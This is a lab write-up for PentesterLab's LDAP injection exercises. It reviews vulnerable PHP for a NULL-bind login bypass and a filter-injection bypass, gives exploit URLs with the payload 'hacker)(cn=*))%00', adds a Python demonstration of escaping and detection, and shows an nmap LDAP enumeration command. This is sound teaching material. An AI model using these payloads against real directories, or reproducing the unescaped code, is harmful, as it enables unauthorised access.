Pentesterlab--Web for Pentester-LDAP

Web for Pentester: This exercise is a set of the most common web vulnerabilities

Difficulty: 1/5

What is LDAP injection?

from OWASP:

LDAP Injection is an attack used to exploit web based applications that construct LDAP statements based on user input. When an application fails to properly sanitize user input, it’s possible to modify LDAP statements using a local proxy. This could result in the execution of arbitrary commands such as granting permissions to unauthorized queries, and content modification inside the LDAP tree. The same advanced exploitation techniques available in SQL Injection can be similarly applied in LDAP Injection.

more information: LDAP injection

Example 1

from pentesterlab:

In this first example, you connect to an LDAP server, using your username and password. In this instance, the LDAP server does not authenticate you, since your credentials are invalid. However, some LDAP servers authorise NULL Bind: if null values are sent, the LDAP server will proceed to bind the connection, and the PHP code will think that the credentials are correct. To get the bind with 2 null values, you will need to completely remove this parameter from the query. If you keep something like username=&password= in the URL, these values will not work, since they won't be null; instead, they will be empty.

code review:

example1.php

  // $ld is the connection handle returned earlier by ldap_connect()
  if ($ld) {
    if (isset($_GET["username"])) {
      // DN built by string concatenation; the value is used as-is
      $user = "uid=".$_GET["username"].",ou=people,dc=pentesterlab,dc=com";
    }
    // no check that the DN or the password is non-empty, so an omitted
    // username/password pair turns into a NULL bind
    $lb = @ldap_bind($ld, $user, $_GET["password"]);
  }

The developer passes the user-supplied DN and password straight to ldap_bind without checking that either value is present. Because the server accepts a NULL bind, leaving both parameters out of the request makes the bind succeed and bypasses the authentication.

exploit:

http://192.168.79.162/ldap/example1.php

Example 2

code review:

example2.php

  // same encoding as an OpenLDAP {MD5} userPassword: base64 of the raw digest
  $pass = "{MD5}".base64_encode(pack("H*", md5($_GET['password'])));
  // $_GET['name'] is concatenated into the filter without ldap_escape()
  $filter = "(&(cn=".$_GET['name'].")(userPassword=".$pass."))";

Our goal here is to inject into the name parameter ($_GET['name'] in the code above). The injected value needs to supply:

  1. The end of the current filter, using hacker).
  2. An always-true condition, for example (cn=*).
  3. A closing ) to balance the opening (& and keep the syntax valid.
  4. A NULL byte (%00) to get rid of the rest of the filter, so the trailing (userPassword=...) clause is never evaluated.

exploit:

http://192.168.79.162/ldap/example2.php?name=hacker)(cn=*))%00&password=rtrtrtr
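To make the four steps above concrete, here is an added Python example (not PentesterLab's code) that rebuilds the filter from example2.php with the payload, shows the truncated filter the C library actually receives, and contrasts it with the same filter built through RFC 4515 escaping (what PHP's ldap_escape() with LDAP_ESCAPE_FILTER provides). The helper names are this example's own.

```python
# Added example (not PentesterLab's code): how the example2 payload rewrites the
# filter built in example2.php, and how RFC 4515 escaping neutralises it.
import base64
import hashlib
from urllib.parse import unquote


def userpassword_md5(password: str) -> str:
    """Same value as PHP's "{MD5}".base64_encode(pack("H*", md5($pw)))."""
    digest = hashlib.md5(password.encode()).digest()
    return "{MD5}" + base64.b64encode(digest).decode()


def ldap_escape_filter(value: str) -> str:
    """RFC 4515 escaping of a filter assertion value: the same five
    characters PHP's ldap_escape($v, '', LDAP_ESCAPE_FILTER) rewrites."""
    return "".join(f"\\{ord(c):02x}" if c in "\\*()\x00" else c for c in value)


def build_filter(name: str, password: str, escape: bool) -> str:
    """The filter from example2.php; escape=True is the hardened variant."""
    if escape:
        name = ldap_escape_filter(name)
    return f"(&(cn={name})(userPassword={userpassword_md5(password)}))"


def as_seen_by_c_library(filter_str: str) -> str:
    """libldap takes the filter as a NUL-terminated C string, so everything
    after the first \\x00 is silently dropped."""
    return filter_str.split("\x00", 1)[0]


def balanced(filter_str: str) -> bool:
    """Cheap server-side sanity check on the finished filter string: parens
    must pair up and nesting depth must never go negative."""
    depth = 0
    for c in filter_str:
        depth += {"(": 1, ")": -1}.get(c, 0)
        if depth < 0:
            return False
    return depth == 0


if __name__ == "__main__":
    # the page's example2 payload, URL-decoded as PHP would see it in $_GET
    name = unquote("hacker)(cn=*))%00")
    raw = build_filter(name, "rtrtrtr", escape=False)
    print(as_seen_by_c_library(raw))   # (&(cn=hacker)(cn=*)) : matches every entry
    print(balanced(raw))               # False: the stray ')' after the NUL
    print(build_filter(name, "rtrtrtr", escape=True))  # metacharacters now literal
```

The balance check is a useful log-side indicator as well: a request whose assembled filter is unbalanced or contains a NUL before the userPassword clause is not something a legitimate login form produces.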

Enumerating the LDAP directory with nmap:

nmap -p 389 --script ldap-search 192.168.79.162